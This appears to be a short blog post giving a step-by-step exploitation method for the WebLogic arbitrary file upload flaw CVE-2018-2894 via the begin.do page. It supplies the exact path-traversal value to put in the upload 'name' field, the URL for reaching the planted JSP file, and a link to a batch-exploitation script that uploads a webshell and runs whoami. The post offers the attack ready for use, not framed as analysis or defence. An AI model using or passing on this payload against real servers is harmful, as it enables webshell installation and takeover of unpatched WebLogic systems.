
cve-2018-2894 不同别人的利用方法。
Weblogic Arbitrary File Upload Vulnerability (CVE-2018-2894)
Recently, everyone has been talking about this vulnerability, and most have noticed the issue at config.do. However, according to
https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ
the information there, begin.do also has a problem. Without further ado, here is the specific exploitation method:
The problem lies on the following page.

When uploading, simply modify the value of "name".

To save you the trouble, here it is:
/../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/
Then access
http://xx.xx.xx.xx:7001/console/framework/skins/wlsconsole/images/_222.jsp
and it will be accessible.

I have written a Python script for batch exploitation. It uploads cat.jsp and then executes whoami.
https://github.com/111ddea/cve-2018-2894.git
For another method using config.do, see below:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894
https://xz.aliyun.com/t/2458?from=timeline&isappinstalled=0